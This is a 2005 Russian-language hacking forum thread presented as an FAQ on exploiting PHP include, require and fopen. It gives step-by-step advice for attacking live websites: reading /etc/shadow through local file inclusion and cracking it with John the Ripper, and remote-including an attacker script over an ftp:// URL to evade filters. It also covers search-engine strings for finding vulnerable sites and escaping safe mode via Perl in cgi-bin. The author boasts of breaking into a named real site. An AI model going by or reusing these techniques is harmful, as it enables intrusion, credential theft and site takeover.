faq: INCLUDE || REQUIRE || FOPEN on PHP
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
faq: INCLUDE || REQUIRE || FOPEN on PHP - 2005-04-07 23:09:55
|
|
|
ShAnKaR
Сообщений: 100
Оценки: 0
Присоединился: 2005-04-02 04:29:41
|
некоторые советы по использованию этих функций.
1) при попытке проинклудить удалённый файл выдаётся:
'URL file-access is disabled in the server configuration'
методы борьбы:
a) проверяем сайт на открытый доступ к ftp для guest и возможность записи хоть куда-нибуть (например папка incoming), потом догадываемся какой путь к этому файлу (или узнаём), инклудим. У меня так один раз было файл нашел с первого раза в папке /var/ftp/incoming - небо было на моей стороне.[sm=1.gif]
b) если возможно инклудить локальные файлы стоит попробовать /etc/shadow || /etc/master.passwd
(потом john the ripper нам поможет)
и доступ с этими данными ко всяким сервисам.
у меня так было на сайте www.bettendorfstanford.com
правда я лоханулся и присвоил юзеру под которым крутился апач uid 0 gid 0
доступ пропал…[sm=19.gif]
этот сайт можете и посей день видеть(админ наверное в запое)
2) выдаётся самопальная надпись типа 'пошёл на /\S{3}/' или 'недопустимые символы в url'
автор скрипта скорей всего создал проверку на словосочетание http, но что мешает загрузить файл по ftp ? создаём сайтик например на chat.ru, by.ru (на народе теперь не получается через ftp - отключили)
и получаем такой формат: ftp://login:password@login.chat.ru/shits_Sсгiрt.php
- грузится за милую душу[sm=1.gif]
мало кому известно о баге с fopen() но это практически также действует, разве что можно ещё смотреть содержимое локальных директорий просто подставляя ../ /etc/ /home/ и т.д.
Как это всё найти на просторах сети через поисковик (альтернативный способ):
словосочетаниями:
если include() то
failed opening for incluision
если require() то
failed opening for required
если fopen() то
warning fopen
———————————————
скрипт для проверки сайта на личие ошибки php injectioninject.php
P.S.
Кстати я считаю полной глупостью использовать системные команды (которые к томуже логируются), когда есть возможность использовать стандартные функции php (пример такого многофункционального скрипта shell.php)
ещё P.S.
вот если выдаёт:
function exec() disabled и иже с ними
или ещё safe mode на php и ниже текущей папки не выйти, чё делать?[sm=9.gif]
Вот!
ищем какой-нито скрипт подключения к db(если есть) и проверяем те логин и пароль на ftp(если получится)
заходим в папочку cgi-bin и записываем скрипт на перле( а на перл safe mode не поставишь) и всё OK [sm=14.gif]
И ещё P.S.
какойто придурок на одном сайте написал что можно завершать линк символом %00, это в perlе так можно а в php я завершаю просто знаком '?' .
|
|
|
|
|
faq: INCLUDE || REQUIRE || FOPEN on PHP - 2005-04-08 02:44:53
|
|
|
cybermind
Сообщений: 805
Оценки: 0
Присоединился: 2004-05-24 20:16:13
|
Спасибо, узнал много нового
|
|
|
|
|
faq: INCLUDE || REQUIRE || FOPEN on PHP - 2005-04-08 12:51:55
|
|
|
Nightfly
Сообщений: 1381
Оценки: 0
Присоединился: 2004-03-12 11:46:07
|
>>b) если возможно инклудить локальные файлы стоит попробовать /etc/shadow ||
>>/etc/master.passwd
>>(потом john the ripper нам поможет)
это только в случае аппача запущеного с юидом 0 или если мальчики сделали chmod 777 /etc/shadow(интерестно кому это надо???)
>>какойто придурок на одном сайте написал что можно завершать линк символом %00, это в
>>perlе так можно а в php я завершаю просто знаком '?' .
а в 5.0.2-5.0.4 оно работает? а то особо не в курсе [sm=sm128.gif]
|
|
|
|
|
faq: INCLUDE || REQUIRE || FOPEN on PHP - 2005-04-08 18:16:53
|
|
|
ShAnKaR
Сообщений: 100
Оценки: 0
Присоединился: 2005-04-02 04:29:41
|
Надо внимательней читать- я же рассказал про угробленый сайт, где Я поставил апачу uid 0.
А так вообще мне не считая этого сервера ещё один раз попадался где у юзера под которым крутится апач были ох-е права чуть меньше чем у рута но с возможностью записи в /etc и т.п.
|
|
|
|
|
faq: INCLUDE || REQUIRE || FOPEN on PHP - 2005-04-08 18:50:30
|
|
|
Nightfly
Сообщений: 1381
Оценки: 0
Присоединился: 2004-03-12 11:46:07
|
Ну в принципе некоторые "особо умные" СУК на жсп с томкетом и жбосом требуют нулевого юида. Меня правда более интересует обход насильнического добавления расширения к имени файла инклудом на пхп.
|
|
|
|
|
faq: INCLUDE || REQUIRE || FOPEN on PHP - 2005-04-08 20:13:55
|
|
|
ShAnKaR
Сообщений: 100
Оценки: 0
Присоединился: 2005-04-02 04:29:41
|
ХОЧЕШЬ ЧТО-ТО СПРОСИТЬ- ПРОЧИТАЙ СЕМЬ РАЗ МОЙ ПЕРВЫЙ ТЕКСТ[sm=mad.gif]
избавляемся от насильнеческого добавления расширения знаком '?'
|
|
|
|
|
faq: INCLUDE || REQUIRE || FOPEN on PHP - 2005-04-08 23:12:32
|
|
|
ShAnKaR
Сообщений: 100
Оценки: 0
Присоединился: 2005-04-02 04:29:41
|
перепечатывание данного мною материала где-либо, без моего согласия, будет жестоко наказыватся[sm=scull.gif]
|
|
|
|
|
faq: INCLUDE || REQUIRE || FOPEN on PHP - 2005-04-09 23:22:43
|
|
|
Nightfly
Сообщений: 1381
Оценки: 0
Присоединился: 2004-03-12 11:46:07
|
>>ХОЧЕШЬ ЧТО-ТО СПРОСИТЬ- ПРОЧИТАЙ СЕМЬ РАЗ МОЙ ПЕРВЫЙ ТЕКСТ
только не надо орать :)
В принципе хотелось бы увидеть сие на практике например практический результат при
использовании синтаксической конструкции типа
<?
$a=$_GET['a'];
include "ex/$a.php";
?>
ну на связочке скажем apache+php 5.0.2
>>Перепечатывание данного мною материала где-либо, без моего согласия, будет жестоко наказыватся
Склоняю голову пред вашим писательским талантом. "Всi авторськi права захищено монтiровкою" (С) Завхоз [sm=9.gif][sm=9.gif][sm=9.gif]
|
|
|
|
|
faq: INCLUDE || REQUIRE || FOPEN on PHP - 2005-04-10 16:44:19
|
|
|
ShAnKaR
Сообщений: 100
Оценки: 0
Присоединился: 2005-04-02 04:29:41
|
обойти 'ex/' никак нельзя
в этом примере можно только локальные php файлы инклудить
|
|
|
|
|
faq: INCLUDE || REQUIRE || FOPEN on PHP - 2005-04-10 17:10:06
|
|
|
Nightfly
Сообщений: 1381
Оценки: 0
Присоединился: 2004-03-12 11:46:07
|
Ну здесь вы к сожаленю сударь не совсем правы ибо ../ еще не отменяли а интересует меня именно обход насильного добавления расширения .php В догонку ремвью ессно я инклудить не соббираюсь просто нидед маленький файлец с хоста.
|
|
|
|
|
faq: INCLUDE || REQUIRE || FOPEN on PHP - 2005-04-10 19:02:29
|
|
|
ShAnKaR
Сообщений: 100
Оценки: 0
Присоединился: 2005-04-02 04:29:41
|
repit:
в этом примере можно только локальные php файлы инклудить
|
|
|
|
|
faq: INCLUDE || REQUIRE || FOPEN on PHP - 2005-04-10 19:16:10
|
|
|
XMblPb
Сообщений: 245
Оценки: 0
Присоединился: 2005-01-11 19:39:40
|
>>>правда я лоханулся и присвоил юзеру под которым крутился апач uid 0 gid 0
доступ пропал…
а как???
|
|
|
|
|
faq: INCLUDE || REQUIRE || FOPEN on PHP - 2005-04-10 20:44:24
|
|
|
ShAnKaR
Сообщений: 100
Оценки: 0
Присоединился: 2005-04-02 04:29:41
|
молча, читать внимательнее надо
|
|
|
|
|
faq: INCLUDE || REQUIRE || FOPEN on PHP - 2005-04-11 11:30:41
|
|
|
Nightfly
Сообщений: 1381
Оценки: 0
Присоединился: 2004-03-12 11:46:07
|
>>repit:
may be repeat? [sm=2.gif]
>>в этом примере можно только локальные php файлы инклудить
млять мне и надо локальные файлы но малость с иным расширением(такое впечатление что говоришь со стенкой).
ЗЫ в принципе уже разобрался - спасибо за бесполезность
[sm=9.gif]
|
|
|
|
|
faq: INCLUDE || REQUIRE || FOPEN on PHP - 2005-04-11 16:14:02
|
|
|
XMblPb
Сообщений: 245
Оценки: 0
Присоединился: 2005-01-11 19:39:40
|
quote:
—————-<BR>Цитата: Дата:10.04.2005 20:44:24, Автор:ShAnKaR ::
молча, читать внимательнее надо
—————-
насколько я понял, если премишн денайдед на /etc/shadow || /etc/master.passwd то ничего не получится.
|
|
|
|
|
|
